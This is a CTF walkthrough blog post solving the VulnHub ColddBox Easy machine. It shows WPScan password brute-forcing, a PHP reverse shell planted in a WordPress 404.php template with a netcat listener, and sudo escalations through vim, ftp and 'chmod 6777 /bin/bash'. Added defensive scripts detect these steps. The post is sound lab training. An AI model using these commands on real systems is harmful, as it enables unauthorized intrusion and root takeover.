c0lddbox : Walkthrough 📝

WhiteFight18 · Published in The Gray Area · 7 min read · Nov 12, 2022

This is a write-up for the VulnHub CTF machine COLDDBOX: EASY (download here). Recently I had a project to solve this machine, and here's how I obtained the two flags. This machine works best with VirtualBox, but I also have a secret sauce at the end to make it work on VMware ;)


Methodology I used:

• Reconnaissance
• Scanning
• Enumerating Users
• Uploading Payload
• Gaining Access
• Privilege Escalation

Download the machine from the link above, import it from the .ova file, and spin up both the attacker machine (Kali Linux here) and the target machine (the c0lddbox).

> Reconnaissance
This machine has DHCP enabled, so it should get an IP address assigned automatically. Here I ran an ARP scan with the 'netdiscover' tool to find our target machine's IP.

Netdiscover is an active/passive address reconnaissance tool, mainly developed for wireless networks without a DHCP server. It can passively detect online hosts, or search for them by actively sending ARP requests.

sudo netdiscover -r <your_ip_range>
Using netdiscover for recon

> Scanning
I followed up with an 'nmap' scan using the -T4 -p- -A flags: faster timing, all 65535 ports, and aggressive scan options (OS and version detection, script scanning and traceroute).

Nmap, short for Network Mapper, is a free and open-source tool used for vulnerability checking, port scanning and, of course, network mapping.

nmap -T4 -p- -A <target_ip>
Doing nmap scan on our target

The scan results reveal two open ports on our target:

Port: 80/tcp open | Service: http | Version: Apache httpd 2.4.18 ((Ubuntu))

Port: 4512/tcp open | Service: ssh | Version: OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

SSH is available on the target, but we need a valid user to log in as, so I went to the site hosted on port 80 of the target IP.

c0lddbox homepage on port 80
Website hosted on http://<target_ip>

Clicking the "Log in" link in the left-hand Meta section of the page above takes us to a WordPress login page, so the site runs the WordPress CMS (Content Management System).

WordPress Login Page of victim machine

> Enumerating Users
To enumerate valid credentials we can use Burp Suite, the Metasploit Framework or WPScan. I used WPScan here, first to find the usernames.

WPScan can detect the versions of the WordPress core, plugins and themes, as well as publicly accessible sensitive data: it checks for publicly accessible wp-config.php backups and other database exports.

wpscan --url <target_ip> --enumerate u
Executing WPScan for enumerating users

The WPScan run found 4 users. I tried 'c0ldd' first because it is the obvious choice: the machine itself is named after it.

Users found after enumeration

I went on to brute-force the password of the user c0ldd, using the same tool, WPScan, and the rockyou.txt wordlist that ships with Kali.

wpscan --url <ip> --usernames c0ldd --passwords /usr/share/wordlists/rockyou.txt
Executing WPScan for brute-forcing password

Soon a valid password was found for the user c0ldd!
Password: 9876543210

Password found! YAY!
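From the defender's side, a brute-force like the WPScan run above leaves a burst of POST requests to wp-login.php from a single source in the Apache access log. The Python script below is an added example (not from the original write-up) that flags such bursts with a sliding window; the combined-log layout, IPs and user agent in the sample are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" access-log layout (assumed; the box's real logs are not on the page).
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "[^"]*" "([^"]*)"'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status, user_agent) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, ua = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status), ua

def detect_login_bruteforce(lines, threshold=20, window=60):
    """Flag source IPs that POST to wp-login.php at least `threshold` times inside
    any sliding window of `window` seconds. Returns {ip: peak attempts in a window}."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, _status, _ua = rec
        if method != "POST" or not path.startswith("/wp-login.php"):
            continue
        q = recent[ip]
        q.append(when)
        while (when - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: a 25-request WPScan-style burst plus ordinary traffic."""
    fmt = '{ip} - - [12/Nov/2022:10:00:{s:02d} +0000] "{m} {p} HTTP/1.1" {c} 512 "-" "{ua}"'
    lines = [fmt.format(ip="10.0.2.15", s=i, m="POST", p="/wp-login.php", c=200, ua="WPScan v3")
             for i in range(25)]
    lines.append(fmt.format(ip="10.0.2.7", s=30, m="GET", p="/", c=200, ua="Mozilla/5.0"))
    lines.append(fmt.format(ip="10.0.2.7", s=31, m="POST", p="/wp-login.php", c=302, ua="Mozilla/5.0"))
    return lines

if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(sample_log()).items():
        print(f"possible wp-login.php brute force from {ip}: {n} POSTs within 60 s")
```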

Now that we have a valid credential, I logged in with it on the WordPress login page, and voila! It took me to the WordPress admin dashboard!

WordPress Admin Login using obtained credentials

> Uploading Payload
Since the admin can modify any theme template under 'Appearance', I went ahead and edited the 404.php template to upload our payload, i.e. the php-reverse-shell from pentest monkey (link here).

A reverse shell, also known as a remote shell or "connect-back shell", is a shell session that the compromised target initiates by connecting back to the attacker's listener, giving the attacker access to the victim's computer.

Edited the whole 404.php with the php-reverse-shell payload

Here we need to modify a couple of parameters to successfully receive the incoming reverse-shell connection from our victim: change $ip and $port to your attacker machine's IP and a port to listen on, as I did.

Changing $ip & $port parameters accordingly
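The edit above leaves a trace on the web root: a theme template that now contains socket and process-execution calls side by side. As an added example (not part of the original write-up), the Python scanner below walks a theme directory and flags PHP files that combine both; the theme tree it builds is constructed, and its 404.php holds only a placeholder skeleton, not a working shell.

```python
import os
import re
import tempfile

# Function families typical of PHP connect-back shells such as the pentestmonkey
# one: a socket call and a process-spawn call together in one template file.
SOCKET_FUNCS = re.compile(r"\b(fsockopen|socket_create|stream_socket_client)\s*\(")
EXEC_FUNCS = re.compile(r"\b(proc_open|popen|shell_exec|exec|system|passthru)\s*\(")

def scan_theme_dir(root):
    """Return the .php files under `root` that contain both a socket call and a
    process-execution call, sorted by path."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    src = fh.read()
            except OSError:
                continue
            if SOCKET_FUNCS.search(src) and EXEC_FUNCS.search(src):
                hits.append(path)
    return sorted(hits)

def build_sample_theme():
    """Constructed theme tree in a temp dir: an untouched index.php beside a 404.php
    whose body was replaced by a connect-back skeleton (signature only, not a working
    shell). Returns the temp root path."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "twentyfifteen")
    os.makedirs(theme)
    with open(os.path.join(theme, "index.php"), "w") as fh:
        fh.write("<?php get_header(); ?>\n<p>Nothing found.</p>\n<?php get_footer(); ?>\n")
    with open(os.path.join(theme, "404.php"), "w") as fh:
        fh.write("<?php\n$ip = 'ATTACKER_IP_PLACEHOLDER'; $port = 4444;\n"
                 "$sock = fsockopen($ip, $port);\n"
                 "proc_open('/bin/sh', $descriptorspec, $pipes);\n")
    return root

if __name__ == "__main__":
    for path in scan_theme_dir(build_sample_theme()):
        print("suspicious theme file:", path)
```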

> Exploiting & Gaining Access
After uploading our payload, we first need to set up our 'netcat' (nc) listener to catch the connect-back shell, and then trigger the payload by visiting the 404.php page.

netcat is a networking utility that reads and writes data across network connections using the TCP/IP protocols.

To set up the netcat listener: nc -nlvp 4444

Netcat listening on 4444 port

URL path to the 404.php page:

http://<your_target_ip>/wp-content/themes/twentyfifteen/404.php

As soon as I hit the 404.php page, we get a reverse shell on our listener.

YaY! Got a reverse-shell

I checked whether python3 is installed there and found that it is, so we upgrade the basic shell to a python TTY shell with the following command:

python3 -c 'import pty; pty.spawn("/bin/bash")'
Upgrading to a python tty shell

Now we need to find the WordPress config file, since in most scenarios it contains valid database credentials. I found the wp-config.php file in the /var/www/html directory, and a username and password combo in it.

MySQL Database credentials found!

At this point, if there is password reuse, we can try SSH-ing into the machine with those credentials, or just su (switch user) to c0ldd. I logged in over SSH on port 4512, since SSH was running on that port and there was password reuse.

And here I got the first flag! Let's go! It is base64 encoded, so after decoding and translating it we get: "Congratulations, first level achieved!"

Captured the first flag!
Decoding the 1st base64 encoded flag
Translation

> Privilege Escalation
We need root access on this machine, since one more flag is left for the root-level user, so we have to do privilege escalation.

Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

To do so, we check which binaries we are allowed to run as root without the root password. I used sudo -l to list them; any of these can be used to gain elevated access to root and do a priv-esc.

Listing available binaries for root access with ‘sudo -l’

Here we take help from the very popular GTFOBins, and can easily escalate through any of the three binaries listed: vim, chmod and ftp.
I'll show all three methods of escalating privileges here:

a) Using vim:

sudo vim -c ':!/bin/sh'
Using vim for priv-esc

b) Using chmod:

sudo -u root chmod 6777 /bin/bash
bash -p
Using chmod for priv-esc

c) Using ftp:

sudo ftp
!/bin/bash
Using ftp for priv-esc
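The sudo entries above are exactly what a host audit should catch before an attacker does. The Python script below is an added example (not from the write-up) that parses sudo -l style output, flags the three binaries with their GTFOBins reasoning, and checks whether a shell has been left SUID/SGID as the chmod method does; the sudo -l layout, hostname and sample output are constructed assumptions.

```python
import os
import stat

# sudo-able binaries that hand the caller a root shell or arbitrary root file
# changes; the three from this box, with the GTFOBins reasoning. Constructed table.
SHELL_ESCAPES = {
    "vim": "runs ':!/bin/sh' from inside the editor",
    "ftp": "runs a shell through its '!' command",
    "chmod": "can set the SUID bit on a shell binary",
}

def parse_sudo_l(text):
    """Extract (runas, command) pairs from lines like '    (root) /usr/bin/vim'."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("(") and ")" in line:
            runas, _, cmd = line.partition(")")
            runas = runas.lstrip("(").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
            entries.append((runas, cmd.strip()))
    return entries

def audit_sudo(text):
    """Return [(command, reason)] for entries that let the user reach a root shell."""
    findings = []
    for runas, cmd in parse_sudo_l(text):
        binary = os.path.basename(cmd.split()[0])
        if runas in ("root", "ALL") and binary in SHELL_ESCAPES:
            findings.append((cmd, SHELL_ESCAPES[binary]))
    return findings

def is_setuid_shell(path, mode=None):
    """True if `path` names a shell carrying the SUID or SGID bit, the state that
    'chmod 6777 /bin/bash' leaves. `mode` may be given for offline checks; otherwise
    the file is stat()ed and a missing file yields False."""
    if mode is None:
        try:
            mode = os.lstat(path).st_mode
        except OSError:
            return False
    is_shell = os.path.basename(path) in ("sh", "bash", "dash", "zsh")
    return is_shell and bool(mode & (stat.S_ISUID | stat.S_ISGID))

# Constructed sample resembling the `sudo -l` output on this box.
SAMPLE_SUDO_L = """User c0ldd may run the following commands on HOSTNAME_PLACEHOLDER:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
    (root) /bin/id
"""
```

Running audit_sudo(SAMPLE_SUDO_L) reports vim, chmod and ftp and leaves /bin/id alone; is_setuid_shell("/bin/bash") on a live host is the check that the chmod method's persistence would trip.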

And here I got the second flag! Let's go! It is also base64 encoded, so after decoding and translating it we get: "Congratulations, machine completed!"

Decoding the 2nd base64 encoded flag
Translation

So that was the solution for this CTF machine; it was a pretty easy one. I hope you find this write-up useful.

Now it's time for the secret sauce to make it work on VMware (although this method is a bypass that skips solving the machine):
Since we have valid credentials for the user 'c0ldd', you can log into the machine directly with username c0ldd and password cybersecurity.
After that, do privilege escalation with any of the three methods above to get into the root account, and execute the "dhclient" command.
This lets the Dynamic Host Configuration Protocol client fetch and assign an IP address to the c0lddbox itself.

Although I’ve already solved some CTF machines in the past, this is my first write-up on this one. Let me know your thoughts on this!

Cheers!💙
~WhiteFight18
